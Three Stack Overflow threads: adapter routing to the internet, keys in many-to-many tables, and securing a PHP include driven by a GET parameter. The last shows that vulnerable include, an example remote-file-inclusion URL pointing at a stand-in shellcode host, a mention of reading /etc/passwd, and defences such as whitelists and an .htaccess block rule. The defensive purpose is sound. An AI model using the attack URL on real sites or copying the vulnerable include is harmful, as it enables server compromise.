A: Technically, there is no "connected to the Internet". The real question is, which interface is routeable to a desired address. Right now, you're querying for the "default route" - the one that applies if no specific route to destination exists. But, you're ignoring any specific routes.
Fortunately, for 99.9% of home users, that'll do the trick. They're not likely to have much of a routing table, and GetBestInterface will automatically prefer wired over wireless - so you should be good. Throw in an override option for the .1% of cases you screw up, and call it a day.
But, for corporate use, you should be using GetBestInterface for a specific destination - otherwise, you'll have issues if someone is on the same LAN as your destination (which means you should take the "internal" interface, not the "external") or has a specific route to your destination (my internal network could peer with your destination's network, for instance).
Then again, I'm not sure what you plan to do with this adapter "connected to the Internet", so it might not be a big deal.
A: Apparently, in Vista there are new interfaces that enable querying for internet connectivity and more. Take a look at the NLM Interfaces and specifically at INetworkConnection - you can specifically query if the network connection has internet connectivity using the GetConnectivity method.
See also: Network Awareness on Windows Vista
Unfortunately, this is only available on Vista, so for XP I'd have to keep my original heuristic.
A: I'd look at the routing table. Whichever NIC has an 0.0.0.0 route AND is enabled AND has the lowest metric, is the nic that's currently sending packets to the internet.
So in my case, the top one is the 'internet nic'.
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.0.0.10 10.0.0.51 20
0.0.0.0 0.0.0.0 10.0.0.10 10.0.0.50 25
(much other stuff deleted)
Another alternative is to ping or GetBestInterface 4.2.2.2 - this is an old and venerable DNS server, currently held by GTEI; formerly by Sprint if I remember right.
A: Start > Run > cmd.exe (this works in XP and Vista): ipconfig /all
This displays all info about the interfaces in your computer. The "public" facing interface should have a public IP address. For starters, it should not be 192.168.x.x or 10.x.x.x :)
A: Look at the routing table? Generally, unless you're routing between the networks in windows (which is possible, but unusual for a client computer these days) the interface that holds the default route is going to have the Internet connection.
Your question didn't detail why or what you're doing this with so I can't provide any specifics. The command line tool "route" may be of some help, but there are probably libraries for whatever programming language you're using to look at the routing table.
You can't rely on the IP address of the interface (e.g., assuming an RFC-1918 address [192.168.0.0/16, 172.16.0.0/12, 10.0.0.0/8] isn't the internet) since most sites have some kind of NATed firewall or proxy setup and the "internet" interface is really on a "private" lan that gets you out to the Internet.
UPDATE: Based on your further information, it sounds like you have a decent solution. I'm not so sure about the choice of 0.0.0.0 since that's a boundary case for IP address -- might be OK on your particular mix of platform/language. Sounds (from the API description) like you could just specify an address, so why not some address known to be on the Internet, e.g. the IP address of your web site, or something more random like 65.66.67.68? Just make sure not to pick one of the rfc-1918 addresses, or the localhost range (127.0.0.0/8), or multicast, any other reserved range, and any address that resolves to a .mil or .gov (while it doesn't sound like getbestinterface sends any traffic, it would suck to find out by having the feds break your door down... :)
A: running traceroute to some public site will show you. Of course, there may be more than one interface that would get you there.
A: From the network's point of view, either interface could be routing to the "internet" at any time. If things like Spanning Tree Protocol are enabled on a switch, then you may find that the card that was doing the routing to begin with is no longer the one doing it.
A: Ping google.com though each NIC.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38864",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: One or Two Primary Keys in Many-to-Many Table? I have the following tables in my database that have a many-to-many relationship, which is expressed by a connecting table that has foreign keys to the primary keys of each of the main tables:
*
*Widget: WidgetID (PK), Title, Price
*User: UserID (PK), FirstName, LastName
Assume that each User-Widget combination is unique. I can see two options for how to structure the connecting table that defines the data relationship:
*
*UserWidgets1: UserWidgetID (PK), WidgetID (FK), UserID (FK)
*UserWidgets2: WidgetID (PK, FK), UserID (PK, FK)
Option 1 has a single column for the Primary Key. However, this seems unnecessary since the only data being stored in the table is the relationship between the two primary tables, and this relationship itself can form a unique key. Thus leading to option 2, which has a two-column primary key, but loses the one-column unique identifier that option 1 has. I could also optionally add a two-column unique index (WidgetID, UserID) to the first table.
Is there any real difference between the two performance-wise, or any reason to prefer one approach over the other for structuring the UserWidgets many-to-many table?
A: Personally, I would have the synthetic/surrogate key column in many-to-many tables for the following reasons:
*
*If you've used numeric synthetic keys in your entity tables then having the same on the relationship tables maintains consistency in design and naming convention.
*It may be the case in the future that the many-to-many table itself becomes a parent entity to a subordinate entity that needs a unique reference to an individual row.
*It's not really going to use that much additional disk space.
The synthetic key is not a replacement to the natural/compound key nor becomes the PRIMARY KEY for that table just because it's the first column in the table, so I partially agree with the Josh Berkus article. However, I don't agree that natural keys are always good candidates for PRIMARY KEY's and certainly should not be used if they are to be used as foreign keys in other tables.
A: Option 2 uses a simple compound key, option 1 uses a surrogate key. Option 2 is preferred in most scenarios and is close to the relational model in that it is a good candidate key.
There are situations where you may want to use a surrogate key (Option 1)
*
*You are not certain that the compound key is a good candidate key over time, particularly with temporal data (data that changes over time). What if you wanted to add another row to the UserWidget table with the same UserId and WidgetId? Think of Employment(EmployerId, EmployeeId) - it would work in most cases, except if someone went back to work for the same employer at a later date
*If you are creating messages/business transactions or something similar that requires an easier key to use for integration. Replication maybe?
*If you want to create your own auditing mechanisms (or similar) and don't want keys to get too long.
As a rule of thumb, when modeling data you will find that most associative entities (many-to-many) are the result of an event: a person takes up employment, an item is added to a basket, etc. Most events have a temporal aspect, where the date or time of the event is relevant - in which case a surrogate key may be the best alternative.
So, take option 2, but make sure that you have the complete model.
A: I agree with the previous answers but I have one remark to add.
If you want to add more information to the relation and allow more relations between the same two entities you need option one.
For example, if you want to track all the times user 1 has used widget 664, then in the userwidget table the (userid, widgetid) combination isn't unique anymore.
A: You only have one primary key in either case. The second one is what's called a compound key. There's no good reason for introducing a new column. In practice, you will have to keep a unique index on all candidate keys. Adding a new column buys you nothing but maintenance overhead.
Go with option 2.
A: What is the benefit of a primary key in this scenario? Consider the option of no primary key:
UserWidgets3: WidgetID (FK), UserID (FK)
If you want uniqueness then use either the compound key (UserWidgets2) or a uniqueness constraint.
The usual performance advantage of having a primary key is that you often query the table by the primary key, which is fast. In the case of many-to-many tables you don't usually query by the primary key so there is no performance benefit. Many-to-many tables are queried by their foreign keys, so you should consider adding indexes on WidgetID and UserID.
A: Option 2 is the correct answer, unless you have a really good reason to add a surrogate numeric key (which you have done in option 1).
Surrogate numeric key columns are not 'primary keys'. A primary key is technically one of the combinations of columns that uniquely identifies a record within a table.
Anyone building a database should read this article http://it.toolbox.com/blogs/database-soup/primary-keyvil-part-i-7327 by Josh Berkus to understand the difference between surrogate numeric key columns and primary keys.
In my experience the only real reason to add a surrogate numeric key to your table is if your primary key is a compound key and needs to be used as a foreign key reference in another table. Only then should you even think to add an extra column to the table.
Whenever I see a database structure where every table has an 'id' column the chances are it has been designed by someone who doesn't appreciate the relational model and it will invariably display one or more of the problems identified in Josh's article.
A: I would go with both.
Hear me out:
The compound key is obviously the nice, correct way to go in so far as reflecting the meaning of your data goes. No question.
However: I have had all sorts of trouble making hibernate work properly unless you use a single generated primary key - a surrogate key.
So I would use a logical and physical data model. The logical one has the compound key. The physical model - which implements the logical model - has the surrogate key and foreign keys.
A: Since each User-Widget combination is unique, you should represent that in your table by making the combination unique. In other words, go with option 2. Otherwise you may have two entries with the same widget and user IDs but different user-widget IDs.
A: The userwidgetid in the first table is not needed, as, like you said, the uniqueness comes from the combination of the widgetid and the userid.
I would use the second table, keep the foreign keys and add a unique index on widgetid and userid.
So:
userwidgets( widgetid(fk), userid(fk),
unique_index(widgetid, userid)
)
There is some performance gain in not having the extra primary key, as the database does not need to maintain an index for it. In the above model, though, an index is still maintained (through the unique_index), but I believe this is easier to understand.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38870",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Best way to avoid code injection in PHP My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $_GET['page'] ) ) {
include( $_GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There were no SQL calls, so I wasn't afraid of SQL injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
A: The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
A: Pek, there are many things to worry about in addition to SQL injection, or even the different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
A: Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}
A: I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
A: Pek, for a short-term fix, apply one of the solutions suggested by other users. For a mid- to long-term plan, you should consider migrating to one of the existing web frameworks. They handle all the low-level stuff like routing and file inclusion in a reliable, secure way, so you can focus on core functionality.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
A: Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('/[^a-zA-Z0-9]/', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could request "h.o.m.e" and it would give the "home" page, since all it does is remove the prohibited characters. It's not intended to stop "smartasses" who want to do cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way, all page accesses with "http:" in the URL (and query string) result in a "Forbidden" error message, without even reaching the PHP script. That results in less server load.
However, keep in mind that no "http" is then allowed anywhere in the query string. Your website MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.
A: Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local Windows network, HTTP and FTP, amongst others. Thus, in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access in the file open functions. Note that it is a system-level setting (PHP_INI_SYSTEM), so it must be set in php.ini or the server configuration rather than toggled with ini_set() at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
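For reference, a defensive php.ini configuration along these lines might look something like this (the open_basedir path is just an example, and allow_url_include only exists in PHP 5.2+):
; php.ini - fall-back safety guards for a site that should only include local files
allow_url_fopen = Off            ; file functions cannot open http:// or ftp:// URLs
allow_url_include = Off          ; include/require cannot load remote code (Off by default)
open_basedir = /var/www/mysite/  ; restrict file access to this directory tree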
A: I know this is a very old post and I expect you don't need an answer anymore, but I think a very important aspect is still missing, imho, and I'd like to share it for other people reading this post. In your code, by including a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice URLs, which are very user and SEO friendly. Instead of a field value like 'page' you could use a URL like 'Spinoza-Ethica'. That is a key in a whitelist, or a primary key in a table in a database, and it returns a hardcoded filename or value (a short sketch of this mapping follows after the list below). That method has several advantages over a normal whitelist:
*
*the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
*Always make sure you end up with hardcoded filenames or an equivalent from the database (preferably a return value from a stored procedure), because it is asking for trouble when you use information from the request to build the response.
*Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
*The URLs represented to the user are user friendly, informing the user about the content of the document.
*Nice URLs are very good for SEO, because search engines are in search of relevant content, and when your URL is in line with the content it will get a better rating. At least a better rating than when your URL is definitely not in line with your content.
*If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
*You will have to sanitize the request, because you get the information from a standard untrusted source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check whether the requested URL conforms to your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ', ", <, >, -, &, ; etc.).
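A minimal PHP sketch of the idea described in this answer (the route names, filenames and allowed-character format are illustrative assumptions; the map could just as well come from a database lookup):
<?php
// Map request keys to hardcoded filenames; the request never names a file directly.
$routes = array(
    'home'           => 'home.php',
    'Spinoza-Ethica' => 'works/spinoza_ethica.php',
    'contact'        => 'contact.php',
);

$requested = isset($_GET['page']) ? $_GET['page'] : 'home';

// Enforce a strict format before even looking the key up, then fall back to home.
if (!preg_match('/^[A-Za-z0-9-]{1,64}$/', $requested) || !isset($routes[$requested])) {
    $requested = 'home';
}

include __DIR__ . '/' . $routes[$requested];
?>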
A: @pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
A: Think of a URL in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If shellcode.txt contains SQL or PHP injection code, then your website will be at risk, right? Do think of this; using a whitelist would help.
There is also a way to filter all variables to guard against such attacks. You can use PHP IDS or the OSE Security Suite for that. After installing the security suite, you need to activate it; here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection; then all POST and GET variables will be filtered, especially the one I mentioned, and if attacks are found, it will report to you immediately.
Safety is always the priority
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38875",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "24"
} |